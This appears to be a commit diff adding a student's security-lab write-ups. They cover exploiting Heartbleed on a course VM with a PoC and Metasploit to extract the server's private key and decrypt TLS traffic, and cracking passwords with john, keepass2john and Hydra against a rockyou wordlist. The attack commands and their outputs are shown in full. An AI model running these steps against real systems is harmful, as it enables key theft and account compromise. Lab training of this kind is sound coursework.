Solve Authentication task

Lab 5 - TLS & SSL/.gitignore

@@ -0,0 +1 @@
+keylog.txt

Lab 5 - TLS & SSL/README.md

@@ -0,0 +1,110 @@
+# TLS & SSL
+All tasks in this lab are solved using the `heartbleed` virtual machine provided by CVUT:
+
+<https://owncloud.cesnet.cz/index.php/s/WZuwlgevX2dhzYf>
+
+## Configuration
+Boot up the virtual machine and (if necessary in `tty1` using `CTRL`+`Alt`+`1`) determine it's IP address:
+
+```sh
+ip address show
+```
+
+Add local DNS entry for VM:
+
+```sh
+echo '{ip address} heartbleed.ssb' | sudo tee --append /etc/hosts
+```
+
+Try accessing the website under <https://heartbleed.ssb>
+
+## Vulnerability Scan
+Scan for vulnerabilities using:
+
+```sh
+sudo nmap -sT -sV -p443 --script=vuln heartbleed.ssb
+```
+
+Result includes:
+
+```
+| ssl-heartbleed: 
+|   VULNERABLE:
+|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
+|     State: VULNERABLE
+|     Risk factor: High
+|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
+|           
+|     References:
+|       http://cvedetails.com/cve/2014-0160/
+|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
+|_      http://www.openssl.org/news/secadv_20140407.txt
+```
+
+## Find & Run Proof of Concept
+```sh
+cd ~
+git clone git@github.com:sensepost/heartbleed-poc.git
+cd heartbleed-poc
+python2 ./heartbleed-poc.py heartbleed.ssb
+```
+
+Result:
+
+```
+WARNING: server heartbleed.ssb returned more data than it should - server is vulnerable!
+```
+
+## Get Private Key
+Open up msfconsole using the corresponding command:
+
+```sh
+msfconsole
+```
+
+Configure heartbleed module:
+
+```sh
+search heartbleed
+use auxiliary/scanner/ssl/openssl_heartbleed
+set RHOSTS heartbleed.ssb
+set ACTION KEYS
+```
+
+### Check
+Check whether system is vulnerable:
+
+```sh
+check
+```
+
+Output:
+```
+The target appears to be vulnerable.
+```
+
+### Attack
+Run attack and get private key:
+
+```sh
+run
+```
+
+### Decrypt Traffic
+  1. Close Firefox completely
+  3. Store pre-shared master secret:
+     ```sh
+     SSLKEYLOGFILE=./keylog.txt firefox
+     ```
+  4. Configure Wireshark
+     1. In `Edit` => `Preferences` under `RSA Keys`, add the private key from the previous attack
+     2. In the preferences window under `Protocols` => `TLS`, set `(Pre)-Master-Secret log filename` to the name of the private key file from the previous attack
+  5. Start a capture on the corresponding network interface
+
+Traffic is now decrypted (notice the green HTTP packets):
+
+![](Traffic.png)
+
+View HTTP communication using {Right Click on HTTP packet} => `Follow` => `HTTP Stream`:
+
+![Alt text](HTTP%20Stream.png)

Lab 9 - Authentication/.gitignore

@@ -0,0 +1,2 @@
+rockyou.txt
+steve_passwords.kdbx

Lab 9 - Authentication/README.md

@@ -0,0 +1,102 @@
+# Authentication
+## Download Wordlist
+```sh
+wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt -O rockyou.txt
+```
+
+## Password Cracking
+Crack Password using `john`:
+
+```sh
+#!/bin/bash
+john --wordlist=./rockyou.txt --format=crypt <(echo '$1$randsalt$1FzqFfQs5tCdStIZl215/.')
+```
+
+As a result we get the password: `topgunner2k7`
+
+## KeePass Cracking
+Download KeePass database:
+
+<https://courses.fit.cvut.cz/BIE-ASB/tutorials/files/steve_passwords.kdbx>
+
+Crack KeePass database password:
+
+```sh
+#!/bin/bash
+john --wordlist=./rockyou.txt <(keepass2john steve_passwords.kdbx)
+```
+
+As a result, we get the password: `dancingdiva11195`
+
+## Online Password Cracking
+This task is solved using the `heartbleed` VM from Lab 5.
+
+### Preparation
+Look up IP address of `heartbleed` VM:
+
+```sh
+ip address show
+```
+
+Add local DNS entry for `heartbleed` VM:
+
+```sh
+echo '{ip address} heartbleed.ssb' | sudo tee --append /etc/hosts
+```
+
+Change Apache configuration to require login:
+
+```diff
+ <VirtualHost *:443>
+     ServerAdmin webmaster@localhost
+ 
+     DocumentRoot /var/www/heartbleed.ssb
+     ServerName heartbleed.ssb
+     ServerAlias www.heartbleed.ssb
+     SSLEngine on
+     SSLCertificateFile /etc/apache2/ssl/apache.crt
+     SSLCertificateKeyFile /etc/apache2/ssl/apache.key
+     ErrorLog ${APACHE_LOG_DIR}/error.log
+     CustomLog ${APACHE_LOG_DIR}/access.log combined
++
++    <Directory "/var/www/heartbleed.ssb">
++        AuthType Basic
++        AuthName "Restricted Content"
++        AuthUserFile /etc/apache2/.htpasswd
++        Require valid-user
++    </Directory>
+ </VirtualHost>
+```
+
+Create user login `test` with a password of your choice (the later the password occurs in `rockyou.txt`, the longer it takes to crack):
+
+```sh
+sudo htpasswd -c /etc/apache2/.htpasswd test
+```
+
+Reload settings:
+
+```sh
+service apache2 reload
+```
+
+### Start Cracking
+Crack password using `Hydra`:
+
+```sh
+hydra -l test -P ./rockyou.txt heartbleed.ssb https-get
+```
+
+Output:
+```
+Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
+
+Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-15 17:15:46
+[WARNING] You must supply the web page as an additional option or via -m, default path set to /
+[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
+[DATA] attacking http-gets://heartbleed.ssb:443/
+[STATUS] 4625.00 tries/min, 4625 tries in 00:01h, 14339773 to do in 51:41h, 16 active
+[443][http-get] host: heartbleed.ssb   login: test   password: vendetta
+1 of 1 target successfully completed, 1 valid password found
+Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-15 17:18:41
+```